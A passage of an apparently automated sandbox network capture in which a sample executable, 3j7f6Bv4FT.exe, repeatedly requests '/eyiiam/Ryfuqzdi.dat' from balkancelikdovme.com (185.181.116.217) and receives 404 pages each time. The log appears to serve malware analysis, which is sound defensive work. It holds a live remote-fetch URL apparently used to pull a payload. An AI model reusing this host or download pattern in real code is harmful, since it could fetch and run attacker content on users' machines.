      2025-01-10 22:05:53 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      71192.168.2.449888185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:54 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:54 GMT
      vary: User-Agent
      2025-01-10 22:05:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      72192.168.2.449895185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:55 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:55 GMT
      vary: User-Agent
      2025-01-10 22:05:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      73192.168.2.449901185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:55 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:56 GMT
      vary: User-Agent
      2025-01-10 22:05:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      74192.168.2.449907185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:56 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:56 GMT
      vary: User-Agent
      2025-01-10 22:05:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      75192.168.2.449915185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:57 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:57 GMT
      vary: User-Agent
      2025-01-10 22:05:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      76192.168.2.449922185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:58 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:58 GMT
      vary: User-Agent
      2025-01-10 22:05:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      77192.168.2.449929185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:59 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:59 GMT
      vary: User-Agent
      2025-01-10 22:05:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      78192.168.2.449935185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:00 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:00 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:00 GMT
      vary: User-Agent
      2025-01-10 22:06:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      79192.168.2.449941185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:01 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:01 GMT
      vary: User-Agent
      2025-01-10 22:06:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      80192.168.2.449948185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:02 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:02 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:02 GMT
      vary: User-Agent
      2025-01-10 22:06:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      81192.168.2.449956185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:03 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:03 GMT
      vary: User-Agent
      2025-01-10 22:06:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      82192.168.2.449964185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:03 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:04 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:04 GMT
      vary: User-Agent
      2025-01-10 22:06:04 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      83192.168.2.449970185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:04 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:04 GMT
      vary: User-Agent
      2025-01-10 22:06:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      84192.168.2.449976185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:05 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:05 GMT
      vary: User-Agent
